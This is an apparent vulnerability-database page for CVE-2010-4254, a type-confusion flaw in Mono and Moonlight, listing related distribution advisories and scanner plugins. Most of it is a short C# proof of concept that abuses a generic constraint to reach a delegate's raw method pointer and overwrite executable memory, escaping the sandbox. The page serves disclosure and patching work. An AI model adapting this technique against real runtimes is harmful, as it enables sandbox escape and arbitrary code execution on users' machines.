| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| CVE-2010-4254 | 11 Jan 201100:00 | – | circl | |
| CVE-2010-4254 | 3 Dec 201020:00 | – | cve | |
| CVE-2010-4254 | 3 Dec 201020:00 | – | cvelist | |
| [SECURITY] Fedora 14 Update: mono-addins-0.5-2.fc14 | 31 Mar 201117:00 | – | fedora | |
| [SECURITY] Fedora 14 Update: mono-2.6.7-4.fc14 | 31 Mar 201117:00 | – | fedora | |
| Fedora 14 : mono-2.6.7-4.fc14 / mono-addins-0.5-2.fc14 (2011-3393) | 1 Apr 201100:00 | – | nessus | |
| GLSA-201206-13 : Mono: Multiple vulnerabilities | 22 Jun 201200:00 | – | nessus | |
| openSUSE Security Update : libmoon-devel (openSUSE-SU-2010:1062-1) | 13 Jun 201400:00 | – | nessus | |
| SuSE 11.1 Security Update : moonlight (SAT Patch Number 3728) | 21 Jan 201100:00 | – | nessus | |
| SuSE 11.1 Security Update : moonlight-plugin (SAT Patch Number 3606) | 21 Jan 201100:00 | – | nessus |
`Mono and Moonlight is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.
PoC:
using System;
using System.Reflection;
using System.Runtime.InteropServices;
public class DelegateWrapper {
public IntPtr method_ptr;
}
public delegate void MethodWrapper ();
public class BreakSandbox {
private static DelegateWrapper Convert <T> (T dingus) where T :
DelegateWrapper {
return dingus;
}
private static DelegateWrapper ConvertDelegate (Delegate del) {
var m = typeof (BreakSandbox).GetMethod ("Convert",
BindingFlags.NonPublic | BindingFlags.Static);
var gm = m.MakeGenericMethod (typeof (Delegate));
var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
(typeof (Func <Delegate, DelegateWrapper>), null, gm);
return d (del);
}
public static void Main (string [] args) {
MethodWrapper d = delegate {
Console.WriteLine ("Hello");
};
d ();
var converted = ConvertDelegate (d);
// Overwrite the already WX page with a 'ret'
Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
d ();
}
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation